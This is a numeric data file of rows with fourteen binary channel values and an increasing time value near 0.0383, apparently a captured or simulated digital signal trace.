0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260240e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260264e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260292e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260316e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260340e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260364e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260388e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260412e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260440e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260468e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260492e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260516e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260540e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260564e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260588e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260612e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260640e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260668e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260692e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260748e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260772e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260796e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260820e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8260828e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,3.8385364e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,3.8385576e-02 1,1,0,0,1,1,0,0,0,1,0,1,0,1,3.8385604e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,3.8385628e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,1,3.8385940e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,3.8385968e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.8385972e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.8385988e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.8386016e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.8386040e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.8386068e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.8386092e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.8386116e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.8386140e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.8386164e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.8386188e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386196e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386212e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386240e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386264e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386292e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386316e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386340e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386364e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386388e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386416e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8386420e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8386468e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8386492e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386500e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386516e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386540e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386564e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386588e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386616e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386640e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8386644e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8386692e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8386716e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386724e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386740e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386764e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386788e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386816e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386840e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386868e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386892e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386916e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8386964e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8386988e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387016e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387040e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8387044e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8387092e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8387116e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387124e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387140e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387164e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387188e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387216e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387240e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387268e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387292e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387316e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8387320e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8387364e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8387388e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387396e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387416e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387440e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387464e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8387492e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8387540e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8387564e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387572e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387588e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387616e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387640e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387668e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387692e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387716e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387764e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387788e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387816e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387840e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387892e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387916e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387940e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8387964e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8387988e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388016e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388040e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388068e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388092e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388116e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8388120e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8388164e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8388188e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388196e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388216e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388240e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8388244e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8388292e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8388316e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388324e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388340e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388364e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388388e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388416e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388440e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388468e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388492e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388516e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8388520e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8388564e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8388588e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388596e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388616e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388640e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388664e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388692e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388716e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388740e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388764e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388788e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388812e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388840e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388868e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388892e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388916e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388940e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8388964e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8388988e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389016e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389040e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389068e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389092e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389116e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389140e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8389144e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8389188e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8389216e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,3.8389220e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389224e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389240e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389268e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389292e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389316e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389340e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389368e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389416e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389440e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389468e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389492e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389516e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389540e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8389544e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8389568e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8389588e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8389616e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8389640e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,3.8389644e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389648e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389692e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389716e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389740e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389768e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389788e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389816e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8389820e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8389868e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8389892e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389900e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389916e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389940e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8389968e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8389988e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390016e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390040e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390092e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390116e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390140e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390164e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390188e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390216e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390240e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390268e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390292e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390316e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390340e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390364e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390388e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390416e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390440e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390468e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390492e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390516e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390564e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390588e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390616e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390640e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390664e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8390692e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8390716e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8390740e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8390764e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8390788e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390796e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390840e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390868e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8390892e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390916e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8390920e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8390964e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8390988e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8390996e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391016e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391040e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391064e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391092e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391116e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391140e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391164e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391188e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8391196e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8391240e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8391268e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,3.8391272e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391276e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391292e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391316e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391340e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391364e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391388e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391416e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391440e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391468e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391492e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391516e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391540e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391564e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391588e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391616e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391640e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391668e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391692e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391716e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391740e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391764e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391788e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391812e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391840e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391868e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391892e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391916e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391940e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8391964e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8391988e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392016e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392040e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392068e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392092e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392116e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392140e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392164e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392188e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392216e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392240e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392264e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392292e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392316e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392340e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392364e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392388e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392412e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392440e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392468e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392492e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392516e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392540e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392564e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392588e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392616e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392640e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392668e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392692e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392720e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392748e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392772e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8392796e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8392820e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8392824e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,3.8517268e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.8517428e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,3.8517444e-02 0,0,1,0,1,1,0,0,0,1,0,1,0,1,3.8517480e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,3.8517500e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,1,3.8517828e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,3.8517852e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.8517860e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,3.8517904e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.8517928e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,3.8517980e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.8518004e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,3.8518052e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.8518076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518100e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8518128e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518156e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8518204e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518228e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8518252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518276e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8518300e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518328e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8518380e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518404e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8518452e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518476e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8518484e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8518528e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8518556e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518560e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8518604e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518628e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8518676e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518704e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8518728e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518752e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8518756e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8518780e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8518804e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518812e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8518852e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518876e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8518928e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8518956e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8519004e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519028e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8519076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519104e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8519108e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8519128e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8519152e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519160e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8519180e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519204e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8519208e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8519252e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8519276e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519284e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8519304e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519328e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8519352e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519380e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8519404e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519428e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8519452e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519476e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8519484e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8519528e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8519556e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519560e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8519580e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519604e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8519628e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519652e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8519660e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8519676e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8519700e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519708e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8519756e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519780e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8519828e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519852e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8519904e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519928e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8519932e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8519956e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8519980e-02 